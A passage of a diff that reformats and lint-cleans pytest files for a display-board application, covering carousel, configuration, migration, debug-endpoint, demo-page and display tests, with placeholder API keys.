+        created = service.create_carousel(CarouselCreate(name="NonZero", page_ids=["a", "b"], interval_seconds=10))
         for ts in [0.0, 5.0, 9.9, 9.999, 10.0, 15.5]:
             secs = service.seconds_until_next_page(created.id, now_unix=ts)
             assert secs >= 1, f"Expected >= 1 at t={ts}, got {secs}"
 
     def test_seconds_until_next_page_decreases_within_interval(self, service):
         """Remaining seconds monotonically decreases within a single interval."""
-        created = service.create_carousel(
-            CarouselCreate(name="Monotonic", page_ids=["a", "b"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="Monotonic", page_ids=["a", "b"], interval_seconds=10))
         prev = service.seconds_until_next_page(created.id, now_unix=0.0)
         for t in range(1, 10):
             curr = service.seconds_until_next_page(created.id, now_unix=float(t))
@@ -471,9 +454,7 @@ class TestCarouselService:
 
     def test_resolve_page_changes_after_interval(self, service):
         """resolve_page_id returns different pages after interval_seconds elapses."""
-        created = service.create_carousel(
-            CarouselCreate(name="Resolve", page_ids=["a", "b", "c"], interval_seconds=10)
-        )
+        created = service.create_carousel(CarouselCreate(name="Resolve", page_ids=["a", "b", "c"], interval_seconds=10))
         page_at_0 = service.resolve_page_id(created.id, now_unix=0.0)
         page_at_10 = service.resolve_page_id(created.id, now_unix=10.0)
         page_at_20 = service.resolve_page_id(created.id, now_unix=20.0)
@@ -503,8 +484,8 @@ class TestCarouselAPI:
         page_storage_file = str(tmp_path / "pages.json")
         carousel_storage_file = str(tmp_path / "carousels.json")
 
-        from src.pages.storage import PageStorage
         from src.pages.service import PageService
+        from src.pages.storage import PageStorage
 
         page_storage = PageStorage(page_storage_file)
         page_service = PageService(page_storage)
@@ -518,6 +499,7 @@ class TestCarouselAPI:
         cs_mod._carousel_service = carousel_service
 
         from fastapi.testclient import TestClient
+
         from src.api_server import app
 
         yield TestClient(app), page_service, carousel_service
@@ -528,13 +510,16 @@ class TestCarouselAPI:
     def _create_pages(self, page_service, count=3):
         """Helper: create test pages and return their IDs."""
         from src.pages.models import PageCreate
+
         ids = []
         for i in range(count):
-            p = page_service.create_page(PageCreate(
-                name=f"Page {i+1}",
-                type="template",
-                template=[f"Content {i+1}"],
-            ))
+            p = page_service.create_page(
+                PageCreate(
+                    name=f"Page {i + 1}",
+                    type="template",
+                    template=[f"Content {i + 1}"],
+                )
+            )
             ids.append(p.id)
         return ids
 
@@ -549,11 +534,14 @@ class TestCarouselAPI:
     def test_create_carousel(self, client):
         c, ps, _ = client
         page_ids = self._create_pages(ps, 2)
-        resp = c.post("/carousels", json={
-            "name": "API Carousel",
-            "page_ids": page_ids,
-            "interval_seconds": 15,
-        })
+        resp = c.post(
+            "/carousels",
+            json={
+                "name": "API Carousel",
+                "page_ids": page_ids,
+                "interval_seconds": 15,
+            },
+        )
         assert resp.status_code == 200
         data = resp.json()
         assert data["status"] == "success"
@@ -562,18 +550,19 @@ class TestCarouselAPI:
 
     def test_create_carousel_invalid_page(self, client):
         c, _, _ = client
-        resp = c.post("/carousels", json={
-            "name": "Bad",
-            "page_ids": ["nonexistent-page-id"],
-        })
+        resp = c.post(
+            "/carousels",
+            json={
+                "name": "Bad",
+                "page_ids": ["nonexistent-page-id"],
+            },
+        )
         assert resp.status_code == 400
 
     def test_get_carousel(self, client):
         c, ps, cs = client
         page_ids = self._create_pages(ps, 2)
-        created = cs.create_carousel(
-            CarouselCreate(name="Fetch", page_ids=page_ids)
-        )
+        created = cs.create_carousel(CarouselCreate(name="Fetch", page_ids=page_ids))
         resp = c.get(f"/carousels/{created.id}")
         assert resp.status_code == 200
         assert resp.json()["name"] == "Fetch"
@@ -586,9 +575,7 @@ class TestCarouselAPI:
     def test_update_carousel(self, client):
         c, ps, cs = client
         page_ids = self._create_pages(ps, 2)
-        created = cs.create_carousel(
-            CarouselCreate(name="Before", page_ids=page_ids)
-        )
+        created = cs.create_carousel(CarouselCreate(name="Before", page_ids=page_ids))
         resp = c.put(f"/carousels/{created.id}", json={"name": "After"})
         assert resp.status_code == 200
         assert resp.json()["carousel"]["name"] == "After"
@@ -601,20 +588,14 @@ class TestCarouselAPI:
     def test_update_carousel_invalid_page(self, client):
         c, ps, cs = client
         page_ids = self._create_pages(ps, 1)
-        created = cs.create_carousel(
-            CarouselCreate(name="UpdBad", page_ids=page_ids)
-        )
-        resp = c.put(f"/carousels/{created.id}", json={
-            "page_ids": ["nonexistent"]
-        })
+        created = cs.create_carousel(CarouselCreate(name="UpdBad", page_ids=page_ids))
+        resp = c.put(f"/carousels/{created.id}", json={"page_ids": ["nonexistent"]})
         assert resp.status_code == 400
 
     def test_delete_carousel(self, client):
         c, ps, cs = client
         page_ids = self._create_pages(ps, 1)
-        created = cs.create_carousel(
-            CarouselCreate(name="Del", page_ids=page_ids)
-        )
+        created = cs.create_carousel(CarouselCreate(name="Del", page_ids=page_ids))
         resp = c.delete(f"/carousels/{created.id}")
         assert resp.status_code == 200
         assert resp.json()["status"] == "success"

--- a/tests/test_config.py
+++ b/tests/test_config.py
@@ -6,11 +6,11 @@ for isolation.
 """
 
 import json
-import pytest
 from unittest.mock import MagicMock, patch
 
-from src.config import Config, classproperty
+import pytest
 
+from src.config import Config, classproperty
 
 # ==================== Fixture ====================
 
@@ -57,6 +57,7 @@ class TestClassproperty:
 
     def test_classproperty_returns_value_on_class_access(self):
         """classproperty returns func(cls) when accessed on class."""
+
         class Foo:
             @classproperty
             def bar(cls):
@@ -79,6 +80,7 @@ class TestClassproperty:
 
     def test_classproperty_on_instance_access(self):
         """classproperty on instance access uses objtype (the class)."""
+
         class Foo:
             @classproperty
             def bar(cls):
@@ -255,12 +257,12 @@ class TestWeatherLocations:
             {"location": "Boston", "name": "Boston"},
         ]
         mock_config_manager._feature_configs["weather"] = {"locations": locations}
-        assert Config.WEATHER_LOCATIONS == locations
+        assert locations == Config.WEATHER_LOCATIONS
 
     def test_weather_locations_single_dict_wrapped_in_list(self, mock_config_manager):
         single = {"location": "SF", "name": "San Francisco"}
         mock_config_manager._feature_configs["weather"] = {"locations": single}
-        assert Config.WEATHER_LOCATIONS == [single]
+        assert [single] == Config.WEATHER_LOCATIONS
 
     def test_weather_locations_old_single_location_fallback(self, mock_config_manager):
         mock_config_manager._feature_configs["weather"] = {"location": "Chicago, IL"}
@@ -392,15 +394,11 @@ class TestHomeAssistantConfig:
         assert Config.HOME_ASSISTANT_ENABLED is True
 
     def test_home_assistant_base_url(self, mock_config_manager):
-        mock_config_manager._feature_configs["home_assistant"] = {
-            "base_url": "http://ha.local:8123"
-        }
+        mock_config_manager._feature_configs["home_assistant"] = {"base_url": "http://ha.local:8123"}
         assert Config.HOME_ASSISTANT_BASE_URL == "http://ha.local:8123"
 
     def test_home_assistant_access_token(self, mock_config_manager):
-        mock_config_manager._feature_configs["home_assistant"] = {
-            "access_token": "token-abc"
-        }
+        mock_config_manager._feature_configs["home_assistant"] = {"access_token": "token-abc"}
         assert Config.HOME_ASSISTANT_ACCESS_TOKEN == "token-abc"
 
     def test_home_assistant_entities_returns_json_string(self, mock_config_manager):
@@ -418,9 +416,7 @@ class TestHomeAssistantConfig:
         assert Config.HOME_ASSISTANT_TIMEOUT == 5
 
     def test_home_assistant_refresh_seconds(self, mock_config_manager):
-        mock_config_manager._feature_configs["home_assistant"] = {
-            "refresh_seconds": 60
-        }
+        mock_config_manager._feature_configs["home_assistant"] = {"refresh_seconds": 60}
         assert Config.HOME_ASSISTANT_REFRESH_SECONDS == 60
 
 
@@ -435,21 +431,15 @@ class TestAirFogConfig:
         assert Config.AIR_FOG_ENABLED is True
 
     def test_purpleair_api_key(self, mock_config_manager):
-        mock_config_manager._feature_configs["air_fog"] = {
-            "purpleair_api_key": "pa-key"
-        }
+        mock_config_manager._feature_configs["air_fog"] = {"purpleair_api_key": "pa-key"}
         assert Config.PURPLEAIR_API_KEY == "pa-key"
 
     def test_purpleair_sensor_id(self, mock_config_manager):
-        mock_config_manager._feature_configs["air_fog"] = {
-            "purpleair_sensor_id": "12345"
-        }
+        mock_config_manager._feature_configs["air_fog"] = {"purpleair_sensor_id": "12345"}
         assert Config.PURPLEAIR_SENSOR_ID == "12345"
 
     def test_openweathermap_api_key(self, mock_config_manager):
-        mock_config_manager._feature_configs["air_fog"] = {
-            "openweathermap_api_key": "owm-key"
-        }
+        mock_config_manager._feature_configs["air_fog"] = {"openweathermap_api_key": "owm-key"}
         assert Config.OPENWEATHERMAP_API_KEY == "owm-key"
 
     def test_air_fog_latitude(self, mock_config_manager):
@@ -480,9 +470,7 @@ class TestMuniConfig:
         assert Config.MUNI_API_KEY == "511-key"
 
     def test_muni_stop_code_returns_first_from_list(self, mock_config_manager):
-        mock_config_manager._feature_configs["muni"] = {
-            "stop_codes": ["15726", "15727"]
-        }
+        mock_config_manager._feature_configs["muni"] = {"stop_codes": ["15726", "15727"]}
         assert Config.MUNI_STOP_CODE == "15726"
 
     def test_muni_stop_code_old_format_fallback(self, mock_config_manager):
@@ -492,7 +480,7 @@ class TestMuniConfig:
     def test_muni_stop_codes_array_format(self, mock_config_manager):
         codes = ["15726", "15727"]
         mock_config_manager._feature_configs["muni"] = {"stop_codes": codes}
-        assert Config.MUNI_STOP_CODES == codes
+        assert codes == Config.MUNI_STOP_CODES
 
     def test_muni_stop_codes_single_value_wrapped(self, mock_config_manager):
         mock_config_manager._feature_configs["muni"] = {"stop_codes": "15726"}
@@ -503,9 +491,7 @@ class TestMuniConfig:
         assert Config.MUNI_STOP_CODES == ["15726"]
 
     def test_muni_stop_names(self, mock_config_manager):
-        mock_config_manager._feature_configs["muni"] = {
-            "stop_names": ["Market & Castro", "Church & Duboce"]
-        }
+        mock_config_manager._feature_configs["muni"] = {"stop_names": ["Market & Castro", "Church & Duboce"]}
         assert Config.MUNI_STOP_NAMES == ["Market & Castro", "Church & Duboce"]
 
     def test_muni_line_name(self, mock_config_manager):
@@ -521,9 +507,7 @@ class TestMuniConfig:
         assert Config.TRANSIT_CACHE_ENABLED is False
 
     def test_transit_cache_refresh_seconds(self, mock_config_manager):
-        mock_config_manager._feature_configs["muni"] = {
-            "transit_cache_refresh_seconds": 120
-        }
+        mock_config_manager._feature_configs["muni"] = {"transit_cache_refresh_seconds": 120}
         assert Config.TRANSIT_CACHE_REFRESH_SECONDS == 120
 
 
@@ -538,9 +522,7 @@ class TestBayWheelsConfig:
         assert Config.BAYWHEELS_ENABLED is True
 
     def test_baywheels_station_id_returns_first_from_list(self, mock_config_manager):
-        mock_config_manager._feature_configs["baywheels"] = {
-            "station_ids": ["123", "456"]
-        }
+        mock_config_manager._feature_configs["baywheels"] = {"station_ids": ["123", "456"]}
         assert Config.BAYWHEELS_STATION_ID == "123"
 
     def test_baywheels_station_id_old_format_fallback(self, mock_config_manager):
@@ -550,7 +532,7 @@ class TestBayWheelsConfig:
     def test_baywheels_station_ids_array_format(self, mock_config_manager):
         ids = ["123", "456"]
         mock_config_manager._feature_configs["baywheels"] = {"station_ids": ids}
-        assert Config.BAYWHEELS_STATION_IDS == ids
+        assert ids == Config.BAYWHEELS_STATION_IDS
 
     def test_baywheels_station_ids_single_string(self, mock_config_manager):
         mock_config_manager._feature_configs["baywheels"] = {"station_ids": "123"}
@@ -599,9 +581,7 @@ class TestTrafficConfig:
         assert Config.TRAFFIC_DESTINATION == "456 Oak Ave"
 
     def test_traffic_destination_name(self, mock_config_manager):
-        mock_config_manager._feature_configs["traffic"] = {
-            "destination_name": "Downtown SF"
-        }
+        mock_config_manager._feature_configs["traffic"] = {"destination_name": "Downtown SF"}
         assert Config.TRAFFIC_DESTINATION_NAME == "Downtown SF"
 
     def test_traffic_destination_name_default(self, mock_config_manager):
@@ -613,12 +593,12 @@ class TestTrafficConfig:
             {"origin": "C", "destination": "D", "destination_name": "D"},
         ]
         mock_config_manager._feature_configs["traffic"] = {"routes": routes}
-        assert Config.TRAFFIC_ROUTES == routes
+        assert routes == Config.TRAFFIC_ROUTES
 
     def test_traffic_routes_single_dict_wrapped(self, mock_config_manager):
         route = {"origin": "A", "destination": "B", "destination_name": "B"}
         mock_config_manager._feature_configs["traffic"] = {"routes": route}
-        assert Config.TRAFFIC_ROUTES == [route]
+        assert [route] == Config.TRAFFIC_ROUTES
 
     def test_traffic_routes_old_format_fallback(self, mock_config_manager):
         mock_config_manager._feature_configs["traffic"] = {
@@ -655,9 +635,7 @@ class TestSilenceScheduleConfig:
         assert Config.SILENCE_SCHEDULE_ENABLED is True
 
     def test_silence_schedule_start_time(self, mock_config_manager):
-        mock_config_manager._feature_configs["silence_schedule"] = {
-            "start_time": "22:00"
-        }
+        mock_config_manager._feature_configs["silence_schedule"] = {"start_time": "22:00"}
         assert Config.SILENCE_SCHEDULE_START_TIME == "22:00"
 
     def test_silence_schedule_start_time_default(self, mock_config_manager):
@@ -686,9 +664,7 @@ class TestStocksConfig:
         assert Config.FINNHUB_API_KEY == "fh-key"
 
     def test_stocks_symbols_list(self, mock_config_manager):
-        mock_config_manager._feature_configs["stocks"] = {
-            "symbols": ["AAPL", "GOOG", "MSFT"]
-        }
+        mock_config_manager._feature_configs["stocks"] = {"symbols": ["AAPL", "GOOG", "MSFT"]}
         assert Config.STOCKS_SYMBOLS == ["AAPL", "GOOG", "MSFT"]
 
     def test_stocks_symbols_string_converted_to_list(self, mock_config_manager):
@@ -700,9 +676,7 @@ class TestStocksConfig:
         assert Config.STOCKS_SYMBOLS == []
 
     def test_stocks_symbols_max_five(self, mock_config_manager):
-        mock_config_manager._feature_configs["stocks"] = {
-            "symbols": ["A", "B", "C", "D", "E", "F"]
-        }
+        mock_config_manager._feature_configs["stocks"] = {"symbols": ["A", "B", "C", "D", "E", "F"]}
         assert Config.STOCKS_SYMBOLS == ["A", "B", "C", "D", "E"]
 
     def test_stocks_symbols_empty_list(self, mock_config_manager):

--- a/tests/test_config_manager.py
+++ b/tests/test_config_manager.py
@@ -32,7 +32,7 @@ def reset_singleton(tmp_path, monkeypatch):
     monkeypatch.delenv("FB_LOCAL_API_KEY", raising=False)
     monkeypatch.delenv("BOARD_HOST", raising=False)
     monkeypatch.delenv("FB_HOST", raising=False)
-    
+
     ConfigManager._instance = None
     ConfigManager._lock = threading.Lock()
     yield tmp_path
@@ -46,7 +46,7 @@ def test_creates_default_config_when_no_file_exists(tmp_path):
     """Creates default config when no file exists."""
     config_path = tmp_path / "config.json"
     assert not config_path.exists()
-    cm = ConfigManager(config_path=str(config_path))
+    ConfigManager(config_path=str(config_path))
     assert config_path.exists()
     loaded = json.loads(config_path.read_text())
     assert "board" in loaded
@@ -78,11 +78,15 @@ def test_pi_profile_does_not_overwrite_existing_instance_name(tmp_path, monkeypa
     """Existing config (e.g. user renamed) is not stomped on next start."""
     monkeypatch.setenv("FIESTABOARD_PROFILE", "pi")
     config_path = tmp_path / "config.json"
-    config_path.write_text(json.dumps({
-        "board": {"api_mode": "local"},
-        "features": {},
-        "general": {"instance_name": "Kitchen Board"},
-    }))
+    config_path.write_text(
+        json.dumps(
+            {
+                "board": {"api_mode": "local"},
+                "features": {},
+                "general": {"instance_name": "Kitchen Board"},
+            }
+        )
+    )
     cm = ConfigManager(config_path=str(config_path))
     assert cm.get_general()["instance_name"] == "Kitchen Board"
 
@@ -767,11 +771,13 @@ def test_reload_reloads_from_file(tmp_path):
     cm = ConfigManager(config_path=str(config_path))
     cm.set_board({"host": "original.com"})
     config_path.write_text(
-        json.dumps({
-            "board": {"api_mode": "local", "host": "reloaded.com"},
-            "features": {},
-            "general": {},
-        })
+        json.dumps(
+            {
+                "board": {"api_mode": "local", "host": "reloaded.com"},
+                "features": {},
+                "general": {},
+            }
+        )
     )
     cm.reload()
     assert cm.get_board()["host"] == "reloaded.com"

--- a/tests/test_config_manager.py
+++ b/tests/test_config_manager.py
@@ -597,7 +597,7 @@ def test_validate_valid_local_config(tmp_path):
     }
     config_path.write_text(json.dumps(config_data))
     cm = ConfigManager(config_path=str(config_path))
-    valid, errors = cm.validate()
+    valid, _errors = cm.validate()
     assert valid is True
 
 

--- a/tests/test_config_migration.py
+++ b/tests/test_config_migration.py
@@ -11,10 +11,10 @@ from pathlib import Path
 import pytest
 
 from src.config_manager import (
-    ConfigManager,
     DEFAULT_CONFIG,
     FEATURE_TO_PLUGIN_MAP,
     MIGRATION_EXCLUDED_FIELDS,
+    ConfigManager,
 )
 
 
@@ -199,7 +199,7 @@ class TestAutoMigration:
 
     def test_backup_created(self, v1_config_path):
         """A .v1_backup file should be created before migration."""
-        cm = ConfigManager(config_path=v1_config_path)
+        ConfigManager(config_path=v1_config_path)
 
         backup = Path(v1_config_path).with_suffix(".json.v1_backup")
         assert backup.exists()
@@ -209,7 +209,7 @@ class TestAutoMigration:
 
     def test_backup_not_overwritten_on_restart(self, v1_config_path):
         """The backup should not be overwritten on subsequent starts."""
-        cm = ConfigManager(config_path=v1_config_path)
+        ConfigManager(config_path=v1_config_path)
         backup = Path(v1_config_path).with_suffix(".json.v1_backup")
         first_content = backup.read_text()
 
@@ -219,7 +219,7 @@ class TestAutoMigration:
         config_data["general"]["timezone"] = "Europe/London"
         Path(v1_config_path).write_text(json.dumps(config_data))
 
-        cm2 = ConfigManager(config_path=v1_config_path)
+        ConfigManager(config_path=v1_config_path)
         assert backup.read_text() == first_content
 
 
@@ -348,7 +348,7 @@ class TestConfigPersistence:
     """Verify migrated config is persisted to disk."""
 
     def test_migration_saved_to_disk(self, v1_config_path):
-        cm = ConfigManager(config_path=v1_config_path)
+        ConfigManager(config_path=v1_config_path)
 
         on_disk = json.loads(Path(v1_config_path).read_text())
         assert "plugins" in on_disk
@@ -357,7 +357,7 @@ class TestConfigPersistence:
 
     def test_migration_survives_restart(self, v1_config_path):
         """After migration + restart, plugins should still be there."""
-        cm = ConfigManager(config_path=v1_config_path)
+        ConfigManager(config_path=v1_config_path)
         _reset_singleton()
 
         cm2 = ConfigManager(config_path=v1_config_path)

--- a/tests/test_debug_endpoints.py
+++ b/tests/test_debug_endpoints.py
@@ -1,8 +1,10 @@
 """Tests for debug API endpoints."""
 
+from unittest.mock import Mock, patch
+
 import pytest
 from fastapi.testclient import TestClient
-from unittest.mock import Mock, patch
+
 from src.api_server import app
 
 
@@ -15,7 +17,7 @@ def client():
 @pytest.fixture
 def mock_board_client():
     """Mock board client."""
-    with patch('src.api_server._get_board_client') as mock:
+    with patch("src.api_server._get_board_client") as mock:
         client = Mock()
         client.send_characters.return_value = (True, True)
         client.test_connection.return_value = True
@@ -24,7 +26,7 @@ def mock_board_client():
             "has_cached_text": False,
             "has_cached_characters": False,
             "skip_unchanged_enabled": True,
-            "cached_text_preview": None
+            "cached_text_preview": None,
         }
         mock.return_value = client
         yield client
@@ -32,7 +34,7 @@ def mock_board_client():
 
 class TestDebugBlank:
     """Tests for /debug/blank endpoint."""
-    
+
     def test_blank_board_success(self, client, mock_board_client):
         """Test blanking the board successfully."""
         response = client.post("/debug/blank")
@@ -40,16 +42,16 @@ class TestDebugBlank:
         data = response.json()
         assert data["status"] == "success"
         assert "blanked" in data["message"].lower()
-        
+
         # Verify send_characters was called with blank array
         mock_board_client.send_characters.assert_called_once()
         args = mock_board_client.send_characters.call_args
         assert args[0][0] == [[0] * 22 for _ in range(6)]
         assert args[1]["force"] is True
-    
+
     def test_blank_board_no_client(self, client):
         """Test blanking board when client not configured."""
-        with patch('src.api_server._get_board_client', return_value=None):
+        with patch("src.api_server._get_board_client", return_value=None):
             response = client.post("/debug/blank")
             assert response.status_code == 400
             assert "not configured" in response.json()["detail"].lower()
@@ -57,7 +59,7 @@ class TestDebugBlank:
 
 class TestDebugFill:
     """Tests for /debug/fill endpoint."""
-    
+
     def test_fill_board_success(self, client, mock_board_client):
         """Test filling the board with a character."""
         response = client.post("/debug/fill", json={"character_code": 63})
@@ -65,37 +67,37 @@ class TestDebugFill:
         data = response.json()
         assert data["status"] == "success"
         assert "63" in data["message"]
-        
+
         # Verify send_characters was called with fill array
         mock_board_client.send_characters.assert_called_once()
         args = mock_board_client.send_characters.call_args
         assert args[0][0] == [[63] * 22 for _ in range(6)]
-    
+
     def test_fill_board_invalid_code(self, client, mock_board_client):
         """Test filling board with invalid character code."""
         # Code too high
         response = client.post("/debug/fill", json={"character_code": 72})
         assert response.status_code == 400
         assert "0-71" in response.json()["detail"]
-        
+
         # Code negative
         response = client.post("/debug/fill", json={"character_code": -1})
         assert response.status_code == 400
-        
+
         # Missing code
         response = client.post("/debug/fill", json={})
         assert response.status_code == 400
-    
+
     def test_fill_board_no_client(self, client):
         """Test filling board when client not configured."""
-        with patch('src.api_server._get_board_client', return_value=None):
+        with patch("src.api_server._get_board_client", return_value=None):
             response = client.post("/debug/fill", json={"character_code": 63})
             assert response.status_code == 400
 
 
 class TestDebugInfo:
     """Tests for /debug/info endpoint."""
-    
+
     def test_show_debug_info_success(self, client, mock_board_client):
         """Test showing debug info on board."""
         response = client.post("/debug/info")
@@ -103,30 +105,30 @@ class TestDebugInfo:
         data = response.json()
         assert data["status"] == "success"
         assert "debug_info" in data
-        
+
         # Verify debug_info contains expected content
         debug_text = data["debug_info"]
         assert "DEBUG INFO" in debug_text
         assert "BOARD:" in debug_text
         assert "SERVER:" in debug_text
-        
+
         # Verify send_characters was called
         mock_board_client.send_characters.assert_called_once()
-    
+
     def test_show_debug_info_no_client(self, client):
         """Test showing debug info when client not configured."""
-        with patch('src.api_server._get_board_client', return_value=None):
+        with patch("src.api_server._get_board_client", return_value=None):
             response = client.post("/debug/info")
             assert response.status_code == 400
 
 
 class TestDebugTestConnection:
     """Tests for /debug/test-connection endpoint."""
-    
+
     def test_connection_success(self, client, mock_board_client):
         """Test successful connection test."""
         mock_board_client.test_connection.return_value = True
-        
+
         response = client.post("/debug/test-connection")
         assert response.status_code == 200
         data = response.json()
@@ -134,27 +136,27 @@ class TestDebugTestConnection:
         assert data["connected"] is True
         assert "latency_ms" in data
         assert isinstance(data["latency_ms"], int)
-    
+
     def test_connection_failure(self, client, mock_board_client):
         """Test failed connection test."""
         mock_board_client.test_connection.return_value = False
-        
+
         response = client.post("/debug/test-connection")
         assert response.status_code == 200
         data = response.json()
         assert data["status"] == "error"
         assert data["connected"] is False
-    
+
     def test_connection_no_client(self, client):
         """Test connection test when client not configured."""
-        with patch('src.api_server._get_board_client', return_value=None):
+        with patch("src.api_server._get_board_client", return_value=None):
             response = client.post("/debug/test-connection")
             assert response.status_code == 400
 
 
 class TestDebugClearCache:
     """Tests for /debug/clear-cache endpoint."""
-    
+
     def test_clear_cache_success(self, client, mock_board_client):
         """Test clearing cache successfully."""
         response = client.post("/debug/clear-cache")
@@ -162,20 +164,20 @@ class TestDebugClearCache:
         data = response.json()
         assert data["status"] == "success"
         assert "cache cleared" in data["message"].lower()
-        
+
         # Verify clear_cache was called
         mock_board_client.clear_cache.assert_called_once()
-    
+
     def test_clear_cache_no_client(self, client):
         """Test clearing cache when client not configured."""
-        with patch('src.api_server._get_board_client', return_value=None):
+        with patch("src.api_server._get_board_client", return_value=None):
             response = client.post("/debug/clear-cache")
             assert response.status_code == 400
 
 
 class TestDebugCacheStatus:
     """Tests for /debug/cache-status endpoint."""
-    
+
     def test_get_cache_status_success(self, client, mock_board_client):
         """Test getting cache status."""
         response = client.get("/debug/cache-status")
@@ -183,31 +185,31 @@ class TestDebugCacheStatus:
         data = response.json()
         assert data["status"] == "success"
         assert "cache" in data
-        
+
         cache = data["cache"]
         assert "has_cached_text" in cache
         assert "has_cached_characters" in cache
         assert "skip_unchanged_enabled" in cache
-        
+
         # Verify get_cache_status was called
         mock_board_client.get_cache_status.assert_called_once()
-    
+
     def test_get_cache_status_no_client(self, client):
         """Test getting cache status when client not configured."""
-        with patch('src.api_server._get_board_client', return_value=None):
+        with patch("src.api_server._get_board_client", return_value=None):
             response = client.get("/debug/cache-status")
             assert response.status_code == 400
 
 
 class TestDebugSystemInfo:
     """Tests for /debug/system-info endpoint."""
-    
+
     def test_get_system_info_success(self, client, mock_board_client):
         """Test getting system info."""
         response = client.get("/debug/system-info")
         assert response.status_code == 200
         data = response.json()
-        
+
         # Verify all expected fields are present
         assert "board_ip" in data
         assert "server_ip" in data
@@ -219,13 +221,13 @@ class TestDebugSystemInfo:
         assert "cache_status" in data or data["cache_status"] is None
         assert "board_configured" in data
         assert "service_running" in data
-    
+
     def test_get_system_info_structure(self, client, mock_board_client):
         """Test system info response structure."""
         response = client.get("/debug/system-info")
         assert response.status_code == 200
         data = response.json()
-        
+
         # Verify types
         assert isinstance(data["uptime_formatted"], str)
         assert isinstance(data["connection_mode"], str)
@@ -236,47 +238,48 @@ class TestDebugSystemInfo:
 
 class TestDebugUtilityFunctions:
     """Tests for debug utility functions."""
-    
+
     def test_get_server_ip(self):
         """Test server IP detection."""
         from src.api_server import _get_server_ip
-        
+
         ip = _get_server_ip()
         assert isinstance(ip, str)
         # Should be either a valid IP or "unknown"
         assert ip == "unknown" or len(ip.split(".")) == 4
-    
+
     def test_format_uptime(self):
         """Test uptime formatting."""
         from src.api_server import _format_uptime
-        
+
         # Test None
         assert _format_uptime(None) == "not running"
-        
+
         # Test seconds only
         assert _format_uptime(30) == "0m"
-        
+
         # Test minutes
         assert _format_uptime(120) == "2m"
-        
+
         # Test hours
         assert _format_uptime(3661) == "1h 1m"
-        
+
         # Test days
         assert _format_uptime(90061) == "1d 1h 1m"
-    
+
     def test_get_service_uptime(self):
         """Test service uptime calculation."""
         from src.api_server import _get_service_uptime
-        
+
         # When service not started
-        with patch('src.api_server._service_start_time', None):
+        with patch("src.api_server._service_start_time", None):
             assert _get_service_uptime() is None
-        
+
         # When service started
         import time
+
         start_time = time.time() - 100
-        with patch('src.api_server._service_start_time', start_time):
+        with patch("src.api_server._service_start_time", start_time):
             uptime = _get_service_uptime()
             assert uptime is not None
             assert 99 <= uptime <= 101  # Allow small variation

--- a/tests/test_demo_pages.py
+++ b/tests/test_demo_pages.py
@@ -8,26 +8,26 @@ Covers:
 - Manifest validation of the demo section
 """
 
-import pytest
-import tempfile
 import os
+import tempfile
 
+import pytest
+
+from src.pages.models import Page, PageCreate
+from src.pages.service import PageService
+from src.pages.storage import CURRENT_SCHEMA_VERSION, PageStorage, _migrate_v1_to_v2
 from src.plugins.manifest import (
     DemoPageSchema,
     PluginManifest,
     validate_manifest,
 )
-from src.pages.models import Page, PageCreate
-from src.pages.storage import PageStorage, _migrate_v1_to_v2, CURRENT_SCHEMA_VERSION
-from src.pages.service import PageService
-
 
 # ---------------------------------------------------------------------------
 # DemoPageSchema + manifest parsing
 # ---------------------------------------------------------------------------
 
-class TestDemoPageSchema:
 
+class TestDemoPageSchema:
     def test_parse_old_format_from_manifest(self):
         """Old flat demo format is normalised to a dict keyed by device_type."""
         data = {
@@ -170,8 +170,8 @@ class TestDemoPageSchema:
 # Manifest validation
 # ---------------------------------------------------------------------------
 
-class TestDemoValidation:
 
+class TestDemoValidation:
     def test_valid_demo_section(self):
         """A well-formed demo section passes validation."""
         data = {
@@ -299,8 +299,8 @@ class TestDemoValidation:
 # Page model – demo_plugin_id
 # ---------------------------------------------------------------------------
 
-class TestPageDemoField:
 
+class TestPageDemoField:
     def test_page_has_demo_plugin_id(self):
         page = Page(
             name="Test",
@@ -339,8 +339,8 @@ class TestPageDemoField:
 # Schema migration v1 -> v2
 # ---------------------------------------------------------------------------
 
-class TestSchemaMigrationV1ToV2:
 
+class TestSchemaMigrationV1ToV2:
     def test_adds_demo_plugin_id(self):
         pages = [
             {"id": "1", "name": "A", "type": "template", "template": ["X"]},
@@ -374,8 +374,8 @@ class TestSchemaMigrationV1ToV2:
 # PageService – demo page operations
 # ---------------------------------------------------------------------------
 
-class TestPageServiceDemo:
 
+class TestPageServiceDemo:
     @pytest.fixture
     def temp_storage_file(self):
         fd, path = tempfile.mkstemp(suffix=".json")

--- a/tests/test_devices.py
+++ b/tests/test_devices.py
@@ -3,11 +3,11 @@
 import pytest
 
 from src.devices import (
-    BoardInstance,
-    DeviceDimensions,
     DEVICE_DIMENSIONS,
     DEVICE_TYPES,
     VALID_API_MODES,
+    BoardInstance,
+    DeviceDimensions,
     get_dimensions,
 )
 

--- a/tests/test_displays.py
+++ b/tests/test_displays.py
@@ -1,15 +1,16 @@
 """Tests for display service and API endpoints."""
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
-from src.displays.service import DisplayService, DisplayResult
+from src.displays.service import DisplayResult, DisplayService
 
 
 class TestDisplayService:
     """Tests for DisplayService class."""
-    
+
     @pytest.fixture
     def mock_plugin_registry(self):
         """Create a mock plugin registry."""
@@ -22,74 +23,71 @@ class TestDisplayService:
         mock_registry.is_enabled.return_value = True
         mock_registry.get_plugin.return_value = Mock()
         return mock_registry
-    
+
     @pytest.fixture
     def service(self, mock_plugin_registry):
         """Create a display service with mocked plugin registry."""
-        with patch('src.displays.service.PLUGIN_SYSTEM_AVAILABLE', True), \
-             patch('src.displays.service.get_plugin_registry') as mock_get_registry:
+        with (
+            patch("src.displays.service.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.displays.service.get_plugin_registry") as mock_get_registry,
+        ):
             mock_get_registry.return_value = mock_plugin_registry
             service = DisplayService()
             yield service
-    
+
     def test_get_available_displays(self, service, mock_plugin_registry):
         """Test listing available displays."""
         displays = service.get_available_displays()
-        
+
         assert len(displays) == 3
         display_types = [d["type"] for d in displays]
         assert "weather" in display_types
         assert "datetime" in display_types
         assert "stocks" in display_types
-    
+
     def test_get_available_displays_includes_availability(self, service, mock_plugin_registry):
         """Test that availability is correctly reported."""
         displays = service.get_available_displays()
-        
+
         weather = next(d for d in displays if d["type"] == "weather")
         assert "available" in weather
         assert "description" in weather
         assert weather["source"] == "plugin"
-    
+
     def test_get_display_invalid_type(self, service, mock_plugin_registry):
         """Test that invalid display type returns error."""
